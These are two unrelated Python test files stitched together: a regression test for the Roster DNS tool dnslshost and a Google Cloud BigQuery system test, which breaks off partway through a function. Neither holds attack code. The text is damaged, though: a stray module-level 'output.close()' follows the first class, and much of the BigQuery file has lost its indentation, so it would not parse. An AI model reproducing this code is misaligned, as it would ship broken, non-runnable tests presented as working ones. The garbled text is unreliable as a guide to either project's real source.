# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Regression test for dnslshost
Make sure you are running this against a database that can be destroyed.
DO NOT EVER RUN THIS TEST AGAINST A PRODUCTION DATABASE.
"""
__copyright__ = 'Copyright (C) 2009, Purdue University'
__license__ = 'BSD'
__version__ = '#TRUNK#'
import os
import sys
import socket
import threading
import time
import getpass
import unittest
import roster_core
import roster_server
from roster_user_tools import roster_client_lib
# Fixture paths, relative to the test working directory.
USER_CONFIG = 'test_data/roster_user_tools.conf'
CONFIG_FILE = 'test_data/roster.conf' # Example in test_data
SCHEMA_FILE = '../roster-core/data/database_schema.sql'
DATA_FILE = 'test_data/test_data.sql'
# Connection/login details for the in-process test server.
HOST = u'localhost'
USERNAME = u'sharrell'
PASSWORD = u'test'
# SSL key/cert used by the server started in DaemonThread.
KEYFILE=('test_data/dnsmgmt.key.pem')
CERTFILE=('test_data/dnsmgmt.cert.pem')
# Credential cache written by GetCredentials; removed in tearDown.
CREDFILE='%s/.dnscred' % os.getcwd()
# Path of the user tool under test.
EXEC='../roster-user-tools/scripts/dnslshost'
class options(object):
    """Stand-in for a parsed command-line options object.

    NOTE(review): presumably consumed by roster_client_lib, so attribute
    names must match what that library reads — verify before renaming.
    """
    password = u'test'
    username = u'sharrell'
    server = None
    ldap = u'ldaps://ldap.cs.university.edu:636'
    credfile = CREDFILE
    view_name = None
    ip_address = None
    target = u'machine1'
    ttl = 64
class DaemonThread(threading.Thread):
    """Hosts a roster_server instance on a background thread for tests."""

    def __init__(self, config_instance, port):
        threading.Thread.__init__(self)
        self.config_instance = config_instance
        self.port = port
        # Filled in once run() constructs the server.
        self.daemon_instance = None

    def run(self):
        """Build the server with the test key/cert and serve forever."""
        server = roster_server.Server(self.config_instance, KEYFILE,
                                      CERTFILE)
        self.daemon_instance = server
        self.daemon_instance.Serve(port=self.port)
class Testdnslshost(unittest.TestCase):
    """Regression tests for the dnslshost user tool.

    setUp creates a throw-away roster database, starts a server on a free
    port, and seeds views/zones/records; each test then runs the dnslshost
    script via os.popen and checks its textual output.
    """

    def setUp(self):
        """Create the test database, start the server, and seed DNS data."""
        def PickUnusedPort():
            # Bind to port 0 so the OS hands us a free ephemeral port.
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.bind((HOST, 0))
            addr, port = s.getsockname()
            s.close()
            return port

        self.config_instance = roster_core.Config(file_name=CONFIG_FILE)
        db_instance = self.config_instance.GetDb()
        db_instance.CreateRosterDatabase()
        # Fix: use a context manager so the data-file handle is not leaked
        # (the original `open(DATA_FILE, 'r').read()` never closed it).
        with open(DATA_FILE, 'r') as data_file:
            data = data_file.read()
        db_instance.StartTransaction()
        db_instance.cursor.execute(data)
        db_instance.EndTransaction()
        db_instance.close()

        self.port = PickUnusedPort()
        self.server_name = 'https://%s:%s' % (HOST, self.port)
        self.daemon_thread = DaemonThread(self.config_instance, self.port)
        self.daemon_thread.daemon = True
        self.daemon_thread.start()
        self.core_instance = roster_core.Core(USERNAME, self.config_instance)
        self.password = 'test'
        # Give the server thread a moment to start accepting connections.
        time.sleep(1)
        roster_client_lib.GetCredentials(USERNAME, u'test', credfile=CREDFILE,
                                         server_name=self.server_name)

        # Seed views, zones, and records exercised by the tests below.
        self.core_instance.MakeView(u'test_view')
        self.core_instance.MakeView(u'test_view2')
        self.core_instance.MakeView(u'test_view3')
        self.core_instance.MakeZone(u'reverse_zone', u'master',
                                    u'1.168.192.in-addr.arpa.',
                                    view_name=u'test_view')
        self.core_instance.MakeZone(u'forward_zone', u'master',
                                    u'university.edu.',
                                    view_name=u'test_view')
        self.core_instance.MakeZone(u'forward_zone', u'master',
                                    u'university.edu.',
                                    view_name=u'test_view3')
        self.core_instance.MakeZone(u'reverse_zone', u'master',
                                    u'1.168.192.in-addr.arpa.',
                                    view_name=u'test_view2')
        self.core_instance.MakeZone(u'ipv6zone', u'master',
                                    u'8.0.e.f.f.3.ip6.arpa.',
                                    view_name=u'test_view')
        self.core_instance.MakeRecord(
            u'soa', u'soa1', u'forward_zone',
            {u'name_server': u'ns1.university.edu.',
             u'admin_email': u'admin.university.edu.',
             u'serial_number': 1, u'refresh_seconds': 5,
             u'retry_seconds': 5, u'expiry_seconds': 5,
             u'minimum_seconds': 5}, view_name=u'test_view')
        self.core_instance.MakeRecord(
            u'soa', u'soa1', u'forward_zone',
            {u'name_server': u'ns1.university.edu.',
             u'admin_email': u'admin.university.edu.',
             u'serial_number': 1, u'refresh_seconds': 5,
             u'retry_seconds': 5, u'expiry_seconds': 5,
             u'minimum_seconds': 5}, view_name=u'test_view3')
        self.core_instance.MakeRecord(
            u'soa', u'soa1', u'reverse_zone',
            {u'name_server': u'ns1.university.edu.',
             u'admin_email': u'admin.university.edu.',
             u'serial_number': 1, u'refresh_seconds': 5,
             u'retry_seconds': 5, u'expiry_seconds': 5,
             u'minimum_seconds': 5}, view_name=u'test_view')
        self.core_instance.MakeRecord(
            u'soa', u'soa1', u'reverse_zone',
            {u'name_server': u'ns1.university.edu.',
             u'admin_email': u'admin.university.edu.',
             u'serial_number': 1, u'refresh_seconds': 5,
             u'retry_seconds': 5, u'expiry_seconds': 5,
             u'minimum_seconds': 5}, view_name=u'test_view2')
        self.core_instance.MakeRecord(
            u'aaaa', u'host2', u'forward_zone', {u'assignment_ip':
                u'4321:0000:0001:0002:0003:0004:0567:89ab'}, view_name=u'test_view')
        self.core_instance.MakeRecord(u'a', u'host1', u'forward_zone',
                                      {u'assignment_ip': u'192.168.0.1'},
                                      view_name=u'test_view')
        self.core_instance.MakeRecord(u'a', u'host2', u'forward_zone',
                                      {u'assignment_ip': u'192.168.1.11'},
                                      view_name=u'test_view3')
        self.core_instance.MakeRecord(u'a', u'host3', u'forward_zone',
                                      {u'assignment_ip': u'192.168.1.5'},
                                      view_name=u'test_view')
        self.core_instance.MakeRecord(u'a', u'host4', u'forward_zone',
                                      {u'assignment_ip': u'192.168.1.10'},
                                      view_name=u'test_view')
        self.core_instance.MakeRecord(u'a', u'host5', u'forward_zone',
                                      {u'assignment_ip': u'192.168.1.17'},
                                      view_name=u'test_view3')
        self.core_instance.MakeRecord(u'a', u'host6', u'forward_zone',
                                      {u'assignment_ip': u'192.168.1.8'},
                                      view_name=u'test_view')
        self.core_instance.MakeRecord(u'ptr', u'8',
                                      u'reverse_zone',
                                      {u'assignment_host':
                                          u'host6.university.edu.'},
                                      view_name=u'test_view')
        self.core_instance.MakeRecord(u'ptr', u'4',
                                      u'reverse_zone',
                                      {u'assignment_host':
                                          u'host2.university.edu.'},
                                      view_name=u'test_view2')
        self.core_instance.MakeRecord(u'ptr', u'5',
                                      u'reverse_zone',
                                      {u'assignment_host':
                                          u'host3.university.edu.'},
                                      view_name=u'test_view')
        self.core_instance.MakeRecord(u'ptr', u'10',
                                      u'reverse_zone',
                                      {u'assignment_host':
                                          u'host4.university.edu.'},
                                      view_name=u'test_view2')
        self.core_instance.MakeRecord(u'ptr', u'7',
                                      u'reverse_zone',
                                      {u'assignment_host':
                                          u'host5.university.edu.'},
                                      view_name=u'test_view2')

    def tearDown(self):
        """Remove the credential cache written during setUp."""
        if( os.path.exists(CREDFILE) ):
            os.remove(CREDFILE)

    def testListSingleIP(self):
        """dnslshost cidr with a single IP lists its records across views."""
        self.core_instance.MakeReverseRangeZoneAssignment(u'reverse_zone',
                                                          u'192.168.1.0/24')
        output = os.popen('python %s cidr --cidr-block 192.168.1.5 --no-header '
                          '-s %s -u %s -p %s --config-file %s' % (
                              EXEC, self.server_name,
                              USERNAME, PASSWORD, USER_CONFIG))
        lines = output.read()
        self.assertEqual(len(lines), 129)
        self.assertTrue(
            '192.168.1.5 Reverse host3.university.edu reverse_zone test_view\n'
            in lines)
        self.assertTrue(
            '192.168.1.5 Forward host3.university.edu forward_zone test_view\n'
            in lines)
        output.close()
        output = os.popen('python %s cidr --cidr-block 192.168.1.4 '
                          '-s %s -u %s -p %s --config-file %s --no-header' % (
                              EXEC, self.server_name,
                              USERNAME, PASSWORD, USER_CONFIG))
        self.assertEqual(output.read(),
            '192.168.1.4 Reverse host2.university.edu reverse_zone test_view2\n\n')
        output.close()

    def testListZone(self):
        """dnslshost zone lists records per zone, optionally per view."""
        self.core_instance.MakeReverseRangeZoneAssignment(u'reverse_zone',
                                                          u'192.168.1.0/24')
        output = os.popen('python %s zone -z forward_zone --no-header '
                          '-s %s -u %s -p %s --config-file %s' % (
                              EXEC, self.server_name, USERNAME,
                              PASSWORD, USER_CONFIG))
        lines = output.read()
        # Fix: assertEquals is a deprecated alias of assertEqual.
        self.assertEqual(len(lines), 647)
        self.assertTrue(
            '4321:0000:0001:0002:0003:0004:0567:89ab Forward host2.university.edu '
            'forward_zone test_view\n'
            in lines)
        self.assertTrue(
            '192.168.0.1 Forward host1.university.edu '
            'forward_zone test_view\n'
            in lines)
        self.assertTrue(
            '192.168.1.11 Forward host2.university.edu '
            'forward_zone test_view3\n'
            in lines)
        self.assertTrue(
            '192.168.1.5 Forward host3.university.edu '
            'forward_zone test_view\n'
            in lines)
        self.assertTrue(
            '192.168.1.10 Forward host4.university.edu '
            'forward_zone test_view\n'
            in lines)
        self.assertTrue(
            '192.168.1.17 Forward host5.university.edu '
            'forward_zone test_view3\n'
            in lines)
        self.assertTrue(
            '192.168.1.8 Forward host6.university.edu '
            'forward_zone test_view\n'
            in lines)
        output.close()
        output = os.popen('python %s zone -z forward_zone --no-header '
                          '-v test_view -s %s -u %s -p %s --config-file %s' % (
                              EXEC, self.server_name, USERNAME,
                              PASSWORD, USER_CONFIG))
        lines = output.read()
        self.assertEqual(len(lines), 461)
        self.assertTrue(
            '192.168.1.5 Forward host3.university.edu '
            'forward_zone test_view\n'
            in lines)
        self.assertTrue(
            '192.168.1.8 Forward host6.university.edu '
            'forward_zone test_view\n'
            in lines)
        self.assertTrue(
            '192.168.1.10 Forward host4.university.edu '
            'forward_zone test_view\n'
            in lines)
        self.assertTrue(
            '192.168.0.1 Forward host1.university.edu '
            'forward_zone test_view\n'
            '4321:0000:0001:0002:0003:0004:0567:89ab Forward host2.university.edu '
            'forward_zone test_view\n'
            '192.168.1.5 Forward host3.university.edu '
            'forward_zone test_view\n'
            in lines)
        output.close()
        output = os.popen('python %s zone -z forward_zone --no-header '
                          '-v test_view3 -s %s -u %s -p %s --config-file %s' % (
                              EXEC, self.server_name, USERNAME,
                              PASSWORD, USER_CONFIG))
        self.assertEqual(output.read(),
            '192.168.1.11 Forward host2.university.edu forward_zone test_view3\n'
            '192.168.1.17 Forward host5.university.edu forward_zone test_view3\n\n')
        output.close()
        output = os.popen('python %s zone -z forward_zone --no-header '
                          '-v test_view -s %s -u %s -p %s --config-file %s' % (
                              EXEC, self.server_name, USERNAME,
                              PASSWORD, USER_CONFIG))
        self.assertEqual(output.read(),
            '192.168.0.1 Forward host1.university.edu forward_zone test_view\n'
            '4321:0000:0001:0002:0003:0004:0567:89ab Forward host2.university.edu forward_zone test_view\n'
            '192.168.1.5 Forward host3.university.edu forward_zone test_view\n'
            '192.168.1.10 Forward host4.university.edu forward_zone test_view\n'
            '192.168.1.8 Forward host6.university.edu forward_zone test_view\n\n')
        output.close()
        # Flag combinations that must be rejected by the client.
        output = os.popen('python %s zone -z forward_zone --no-header '
                          '--cidr-block 192.168.56.0/29 -s %s -u %s -p %s '
                          '--config-file %s' % (EXEC, self.server_name,
                                                USERNAME, PASSWORD, USER_CONFIG))
        self.assertEqual(output.read(),
            'CLIENT ERROR: The --cidr-block flag cannot be used with '
            'the zone command.\n')
        output.close()
        output = os.popen('python %s -z forward_zone --no-header '
                          '--cidr-block 192.168.56.0/29 -s %s -u %s -p %s '
                          '--config-file %s' % (EXEC, self.server_name,
                                                USERNAME, PASSWORD, USER_CONFIG))
        self.assertEqual(output.read(),
            'CLIENT ERROR: A command must be specified.\n')
        output.close()

    def testListCIDR(self):
        """dnslshost cidr lists every address in a block, per view/zone."""
        self.core_instance.MakeReverseRangeZoneAssignment(u'reverse_zone',
                                                          u'192.168.1.4/30')
        output = os.popen('python %s cidr --cidr-block 192.168.1.4/30 --no-header '
                          '-v test_view -s %s -u %s -p %s --config-file %s' % (
                              EXEC, self.server_name, USERNAME,
                              PASSWORD, USER_CONFIG))
        lines = output.read()
        # Fix: assertEquals is a deprecated alias of assertEqual.
        self.assertEqual(len(lines), 321)
        self.assertEqual(lines,
            '192.168.1.4 -- -- -- test_view\n'
            '192.168.1.5 Reverse host3.university.edu reverse_zone test_view\n'
            '192.168.1.5 Forward host3.university.edu forward_zone test_view\n'
            '192.168.1.6 -- -- -- test_view\n'
            '192.168.1.7 -- -- -- test_view\n\n')
        output.close()
        output = os.popen('python %s cidr --cidr-block 192.168.1.4/30 '
                          '-s %s -u %s -p %s --config-file %s' % (
                              EXEC, self.server_name, USERNAME,
                              PASSWORD, USER_CONFIG))
        lines = output.read()
        self.assertEqual(len(lines), 653)
        self.assertTrue(
            'View: test_view2\n'
            in lines)
        self.assertTrue(
            '192.168.1.4 Reverse host2.university.edu reverse_zone test_view2\n'
            in lines)
        self.assertTrue(
            '192.168.1.5 -- -- -- test_view2\n'
            in lines)
        self.assertTrue(
            '192.168.1.6 -- -- -- test_view2\n'
            in lines)
        self.assertTrue(
            '192.168.1.7 Reverse host5.university.edu reverse_zone test_view2\n'
            in lines)
        self.assertTrue(
            'View: test_view\n'
            in lines)
        self.assertTrue(
            '192.168.1.4 -- -- -- test_view\n'
            in lines)
        self.assertTrue(
            '192.168.1.5 Reverse host3.university.edu reverse_zone test_view\n'
            in lines)
        self.assertTrue(
            '192.168.1.5 Forward host3.university.edu forward_zone test_view\n'
            in lines)
        self.assertTrue(
            '192.168.1.6 -- -- -- test_view\n'
            in lines)
        self.assertTrue(
            '192.168.1.7 -- -- -- test_view\n'
            in lines)
        output.close()
        output = os.popen('python %s cidr --cidr-block 192.168.1.4/30 --no-header '
                          '-v test_view -s %s -u %s -p %s --config-file %s' % (
                              EXEC, self.server_name, USERNAME,
                              PASSWORD, USER_CONFIG))
        self.assertEqual(output.read(),
            '192.168.1.4 -- -- -- test_view\n'
            '192.168.1.5 Reverse host3.university.edu reverse_zone test_view\n'
            '192.168.1.5 Forward host3.university.edu forward_zone test_view\n'
            '192.168.1.6 -- -- -- test_view\n'
            '192.168.1.7 -- -- -- test_view\n\n')
        output.close()
        output = os.popen('python %s cidr --cidr-block 10.0.0.4/30 --no-header '
                          '-s %s -u %s -p %s --config-file %s' % (
                              EXEC, self.server_name, USERNAME,
                              PASSWORD, USER_CONFIG))
        self.assertEqual(output.read(),
            '10.0.0.4 -- -- -- --\n'
            '10.0.0.5 -- -- -- --\n'
            '10.0.0.6 -- -- -- --\n'
            '10.0.0.7 -- -- -- --\n\n')
        output.close()
        output = os.popen('python %s cidr --cidr-block 192.168.1.4/32 --no-header '
                          '-s %s -u %s -p %s --config-file %s' % (
                              EXEC, self.server_name, USERNAME,
                              PASSWORD, USER_CONFIG))
        self.assertEqual(output.read(),
            '192.168.1.4 Reverse host2.university.edu reverse_zone test_view2\n\n')
        output.close()
        output = os.popen('python %s cidr --cidr-block 192.168.1.4/30 --no-header '
                          '-z forward_zone -s %s -u %s -p %s --config-file %s '
                          '-v test_view' % (EXEC, self.server_name, USERNAME,
                                            PASSWORD, USER_CONFIG))
        self.assertEqual(output.read(),
            '192.168.1.4 -- -- -- test_view\n'
            '192.168.1.5 Forward host3.university.edu forward_zone test_view\n'
            '192.168.1.6 -- -- -- test_view\n'
            '192.168.1.7 -- -- -- test_view\n\n')
        output.close()
        output = os.popen('python %s cidr --cidr-block 192.168.1.4/30 --no-header '
                          '-z reverse_zone -s %s -u %s -p %s --config-file %s '
                          '-v test_view' % (EXEC, self.server_name, USERNAME,
                                            PASSWORD, USER_CONFIG))
        self.assertEqual(output.read(),
            '192.168.1.4 -- -- -- test_view\n'
            '192.168.1.5 Reverse host3.university.edu reverse_zone test_view\n'
            '192.168.1.6 -- -- -- test_view\n'
            '192.168.1.7 -- -- -- test_view\n\n')
        output.close()
        output = os.popen('python %s cidr -z forward_zone --no-header '
                          ' -s %s -u %s -p %s --config-file %s' %
                          (EXEC, self.server_name, USERNAME, PASSWORD, USER_CONFIG))
        self.assertEqual(output.read(),
            'CLIENT ERROR: The --cidr-block flag is required.\n')
        output.close()
output.close()
# Script entry point: run the test suite when executed directly.
if __name__ == '__main__':
    unittest.main()
# ---- file boundary (concatenation artifact) ----
# Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import operator
import unittest
from google.cloud import bigquery
from google.cloud.exceptions import Forbidden
from retry import RetryErrors
from retry import RetryInstanceState
from retry import RetryResult
from system_test_utils import unique_resource_id
def _has_rows(result):
return len(result) > 0
def _make_dataset_name(prefix):
    """Return *prefix* with a unique resource suffix appended."""
    return prefix + unique_resource_id()
def _rate_limit_exceeded(forbidden):
"""Predicate: pass only exceptions with 'rateLimitExceeded' as reason."""
return any(error['reason'] == 'rateLimitExceeded'
for error in forbidden._errors)
# We need to wait to stay within the rate limits.
# The alternative outcome is a 403 Forbidden response from upstream, which
# they return instead of the more appropriate 429.
# See: https://cloud.google.com/bigquery/quota-policy
# Retries a call only when the 403's reason is 'rateLimitExceeded'.
retry_403 = RetryErrors(Forbidden, error_predicate=_rate_limit_exceeded)
class Config(object):
    """Run-time configuration to be modified at set-up.

    This is a mutable stand-in to allow test set-up to modify
    global state.
    """
    # Shared bigquery.Client; assigned once in setUpModule().
    CLIENT = None
def setUpModule():
    """Create the BigQuery client shared by every test in this module."""
    Config.CLIENT = bigquery.Client()
class TestBigQuery(unittest.TestCase):
def setUp(self):
    """Track resources created by the test so tearDown can remove them."""
    self.to_delete = []
def tearDown(self):
    """Delete every resource registered in self.to_delete, with retries."""
    from google.cloud.bigquery.dataset import Dataset
    from google.cloud.storage import Bucket
    from google.cloud.exceptions import BadRequest
    from google.cloud.exceptions import Conflict

    def _still_in_use(bad_request):
        # Datasets that still contain tables fail with reason 'resourceInUse'.
        return any(error['reason'] == 'resourceInUse'
                   for error in bad_request._errors)

    retry_in_use = RetryErrors(BadRequest, error_predicate=_still_in_use)
    retry_409 = RetryErrors(Conflict)
    for doomed in self.to_delete:
        if isinstance(doomed, Bucket):
            # Buckets may race with concurrent creation -> retry on 409.
            retry_409(doomed.delete)(force=True)
        elif isinstance(doomed, Dataset):
            retry_in_use(doomed.delete)()
        else:
            doomed.delete()
def test_create_dataset(self):
    """A created dataset exists and keeps its name."""
    DATASET_NAME = _make_dataset_name('create_dataset')
    dataset = Config.CLIENT.dataset(DATASET_NAME)
    self.assertFalse(dataset.exists())

    retry_403(dataset.create)()
    self.to_delete.append(dataset)

    self.assertTrue(dataset.exists())
    self.assertEqual(dataset.name, DATASET_NAME)
def test_reload_dataset(self):
    """Properties set before create() are visible after reload()."""
    DATASET_NAME = _make_dataset_name('reload_dataset')
    dataset = Config.CLIENT.dataset(DATASET_NAME)
    dataset.friendly_name = 'Friendly'
    dataset.description = 'Description'

    retry_403(dataset.create)()
    self.to_delete.append(dataset)

    # A fresh handle on the same dataset must see the stored properties.
    other = Config.CLIENT.dataset(DATASET_NAME)
    other.reload()
    self.assertEqual(other.friendly_name, 'Friendly')
    self.assertEqual(other.description, 'Description')
def test_patch_dataset(self):
    """patch() updates friendly_name and description in place."""
    dataset = Config.CLIENT.dataset(_make_dataset_name('patch_dataset'))
    self.assertFalse(dataset.exists())

    retry_403(dataset.create)()
    self.to_delete.append(dataset)

    self.assertTrue(dataset.exists())
    self.assertIsNone(dataset.friendly_name)
    self.assertIsNone(dataset.description)
    dataset.patch(friendly_name='Friendly', description='Description')
    self.assertEqual(dataset.friendly_name, 'Friendly')
    self.assertEqual(dataset.description, 'Description')
def test_update_dataset(self):
    """update() persists a modified access-grant list."""
    dataset = Config.CLIENT.dataset(_make_dataset_name('update_dataset'))
    self.assertFalse(dataset.exists())

    retry_403(dataset.create)()
    self.to_delete.append(dataset)

    self.assertTrue(dataset.exists())
    # Drop the default 'projectWriters' grant and push the change.
    after = [grant for grant in dataset.access_grants
             if grant.entity_id != 'projectWriters']
    dataset.access_grants = after

    retry_403(dataset.update)()

    self.assertEqual(len(dataset.access_grants), len(after))
    for found, expected in zip(dataset.access_grants, after):
        self.assertEqual(found.role, expected.role)
        self.assertEqual(found.entity_type, expected.entity_type)
        self.assertEqual(found.entity_id, expected.entity_id)
def test_list_datasets(self):
    """list_datasets() returns every dataset created by the test."""
    datasets_to_create = [
        'new' + unique_resource_id(),
        'newer' + unique_resource_id(),
        'newest' + unique_resource_id(),
    ]
    for dataset_name in datasets_to_create:
        dataset = Config.CLIENT.dataset(dataset_name)
        retry_403(dataset.create)()
        self.to_delete.append(dataset)

    # Retrieve the datasets.
    iterator = Config.CLIENT.list_datasets()
    all_datasets = list(iterator)
    self.assertIsNone(iterator.next_page_token)
    created = [dataset for dataset in all_datasets
               if dataset.name in datasets_to_create and
               dataset.project == Config.CLIENT.project]
    self.assertEqual(len(created), len(datasets_to_create))
def test_create_table(self):
    """A table created with a schema exists and keeps its name."""
    dataset = Config.CLIENT.dataset(_make_dataset_name('create_table'))
    self.assertFalse(dataset.exists())

    retry_403(dataset.create)()
    self.to_delete.append(dataset)

    TABLE_NAME = 'test_table'
    full_name = bigquery.SchemaField('full_name', 'STRING',
                                     mode='REQUIRED')
    age = bigquery.SchemaField('age', 'INTEGER', mode='REQUIRED')
    table = dataset.table(TABLE_NAME, schema=[full_name, age])
    self.assertFalse(table.exists())
    table.create()
    # Delete tables before their dataset (insert at the front).
    self.to_delete.insert(0, table)
    self.assertTrue(table.exists())
    self.assertEqual(table.name, TABLE_NAME)
def test_list_tables(self):
    """list_tables() is empty before creation and complete afterwards."""
    DATASET_NAME = _make_dataset_name('list_tables')
    dataset = Config.CLIENT.dataset(DATASET_NAME)
    self.assertFalse(dataset.exists())

    retry_403(dataset.create)()
    self.to_delete.append(dataset)

    # Retrieve tables before any are created for the dataset.
    iterator = dataset.list_tables()
    all_tables = list(iterator)
    self.assertEqual(all_tables, [])
    self.assertIsNone(iterator.next_page_token)

    # Insert some tables to be listed.
    tables_to_create = [
        'new' + unique_resource_id(),
        'newer' + unique_resource_id(),
        'newest' + unique_resource_id(),
    ]
    full_name = bigquery.SchemaField('full_name', 'STRING',
                                     mode='REQUIRED')
    age = bigquery.SchemaField('age', 'INTEGER', mode='REQUIRED')
    for table_name in tables_to_create:
        table = dataset.table(table_name, schema=[full_name, age])
        table.create()
        # Delete tables before their dataset (insert at the front).
        self.to_delete.insert(0, table)

    # Retrieve the tables.
    iterator = dataset.list_tables()
    all_tables = list(iterator)
    self.assertIsNone(iterator.next_page_token)
    created = [table for table in all_tables
               if (table.name in tables_to_create and
                   table.dataset_name == DATASET_NAME)]
    self.assertEqual(len(created), len(tables_to_create))
def test_patch_table(self):
    """patch() updates a table's friendly_name and description."""
    dataset = Config.CLIENT.dataset(_make_dataset_name('patch_table'))
    self.assertFalse(dataset.exists())

    retry_403(dataset.create)()
    self.to_delete.append(dataset)

    TABLE_NAME = 'test_table'
    full_name = bigquery.SchemaField('full_name', 'STRING',
                                     mode='REQUIRED')
    age = bigquery.SchemaField('age', 'INTEGER', mode='REQUIRED')
    table = dataset.table(TABLE_NAME, schema=[full_name, age])
    self.assertFalse(table.exists())
    table.create()
    # Delete tables before their dataset (insert at the front).
    self.to_delete.insert(0, table)
    self.assertTrue(table.exists())
    self.assertIsNone(table.friendly_name)
    self.assertIsNone(table.description)
    table.patch(friendly_name='Friendly', description='Description')
    self.assertEqual(table.friendly_name, 'Friendly')
    self.assertEqual(table.description, 'Description')
def test_update_table(self):
    """update() persists a schema extended with a new field."""
    dataset = Config.CLIENT.dataset(_make_dataset_name('update_table'))
    self.assertFalse(dataset.exists())

    retry_403(dataset.create)()
    self.to_delete.append(dataset)

    TABLE_NAME = 'test_table'
    full_name = bigquery.SchemaField('full_name', 'STRING',
                                     mode='REQUIRED')
    age = bigquery.SchemaField('age', 'INTEGER', mode='REQUIRED')
    table = dataset.table(TABLE_NAME, schema=[full_name, age])
    self.assertFalse(table.exists())
    table.create()
    # Delete tables before their dataset (insert at the front).
    self.to_delete.insert(0, table)
    self.assertTrue(table.exists())
    # Append a NULLABLE field; adding columns is an allowed schema change.
    voter = bigquery.SchemaField('voter', 'BOOLEAN', mode='NULLABLE')
    schema = table.schema
    schema.append(voter)
    table.schema = schema
    table.update()
    self.assertEqual(len(table.schema), len(schema))
    for found, expected in zip(table.schema, schema):
        self.assertEqual(found.name, expected.name)
        self.assertEqual(found.field_type, expected.field_type)
        self.assertEqual(found.mode, expected.mode)
@staticmethod
def _fetch_single_page(table):
import six
iterator = table.fetch_data()
page = six.next(iterator.pages)
return list(page)
def test_insert_data_then_dump_table(self):
import datetime
from google.cloud._helpers import UTC
NOW_SECONDS = 1448911495.484366
NOW = datetime.datetime.utcfromtimestamp(
NOW_SECONDS).replace(tzinfo=UTC)
ROWS = [
('Phred Phlyntstone', 32, NOW),
('Bharney Rhubble', 33, NOW + datetime.timedelta(seconds=10)),
('Wylma Phlyntstone', 29, NOW + datetime.timedelta(seconds=20)),
('Bhettye Rhubble', 27, None),
]
ROW_IDS = range(len(ROWS))
dataset = Config.CLIENT.dataset(
_make_dataset_name('insert_data_then_dump'))
self.assertFalse(dataset.exists())
retry_403(dataset.create)()
self.to_delete.append(dataset)
TABLE_NAME = 'test_table'
full_name = bigquery.SchemaField('full_name', 'STRING',
mode='REQUIRED')
age = bigquery.SchemaField('age', 'INTEGER', mode='REQUIRED')
now = bigquery.SchemaField('now', 'TIMESTAMP')
table = dataset.table(TABLE_NAME, schema=[full_name, age, now])
self.assertFalse(table.exists())
table.create()
self.to_delete.insert(0, table)
self.assertTrue(table.exists())
errors = table.insert_data(ROWS, ROW_IDS)
self.assertEqual(len(errors), 0)
rows = ()
# Allow for "warm up" before rows visible. See:
# https://cloud.google.com/bigquery/streaming-data-into-bigquery#dataavailability
# 8 tries -> 1 + 2 + 4 + 8 + 16 + 32 + 64 = 127 seconds
retry = RetryResult(_has_rows, max_tries=8)
rows = retry(self._fetch_single_page)(table)
by_age = operator.itemgetter(1)
self.assertEqual(sorted(rows, key=by_age),
sorted(ROWS, key=by_age))
    def test_load_table_from_local_file_then_dump_table(self):
        """Upload a local CSV into an existing table, then verify the rows."""
        import csv
        import tempfile
        ROWS = [
            ('Phred Phlyntstone', 32),
            ('Bharney Rhubble', 33),
            ('Wylma Phlyntstone', 29),
            ('Bhettye Rhubble', 27),
        ]
        TABLE_NAME = 'test_table'
        dataset = Config.CLIENT.dataset(
            _make_dataset_name('load_local_then_dump'))
        # Dataset creation can transiently 403; retry until it sticks.
        retry_403(dataset.create)()
        self.to_delete.append(dataset)
        full_name = bigquery.SchemaField('full_name', 'STRING',
                                         mode='REQUIRED')
        age = bigquery.SchemaField('age', 'INTEGER', mode='REQUIRED')
        table = dataset.table(TABLE_NAME, schema=[full_name, age])
        table.create()
        # Tables must be deleted before their parent dataset.
        self.to_delete.insert(0, table)
        # Write header + data rows to a temp CSV, then upload it with the
        # header skipped; CREATE_NEVER/WRITE_EMPTY require the (empty)
        # table created above.
        with tempfile.NamedTemporaryFile(mode='w+') as csv_file:
            writer = csv.writer(csv_file)
            writer.writerow(('Full Name', 'Age'))
            writer.writerows(ROWS)
            csv_file.flush()
            with open(csv_file.name, 'rb') as csv_read:
                job = table.upload_from_file(
                    csv_read,
                    source_format='CSV',
                    skip_leading_rows=1,
                    create_disposition='CREATE_NEVER',
                    write_disposition='WRITE_EMPTY',
                )
        def _job_done(instance):
            return instance.state.lower() == 'done'
        # Retry until done.
        retry = RetryInstanceState(_job_done, max_tries=8)
        retry(job.reload)()
        self.assertEqual(job.output_rows, len(ROWS))
        rows = self._fetch_single_page(table)
        by_age = operator.itemgetter(1)
        self.assertEqual(sorted(rows, key=by_age),
                         sorted(ROWS, key=by_age))
    def test_load_table_from_storage_then_dump_table(self):
        """Load a table from a GCS-hosted CSV, then verify the loaded rows."""
        import csv
        import tempfile
        from google.cloud.storage import Client as StorageClient
        local_id = unique_resource_id()
        BUCKET_NAME = 'bq_load_test' + local_id
        BLOB_NAME = 'person_ages.csv'
        GS_URL = 'gs://%s/%s' % (BUCKET_NAME, BLOB_NAME)
        ROWS = [
            ('Phred Phlyntstone', 32),
            ('Bharney Rhubble', 33),
            ('Wylma Phlyntstone', 29),
            ('Bhettye Rhubble', 27),
        ]
        TABLE_NAME = 'test_table'
        s_client = StorageClient()
        # In the **very** rare case the bucket name is reserved, this
        # fails with a ConnectionError.
        bucket = s_client.create_bucket(BUCKET_NAME)
        self.to_delete.append(bucket)
        blob = bucket.blob(BLOB_NAME)
        # Stage the CSV (header + data rows) in the new bucket.
        with tempfile.TemporaryFile(mode='w+') as csv_file:
            writer = csv.writer(csv_file)
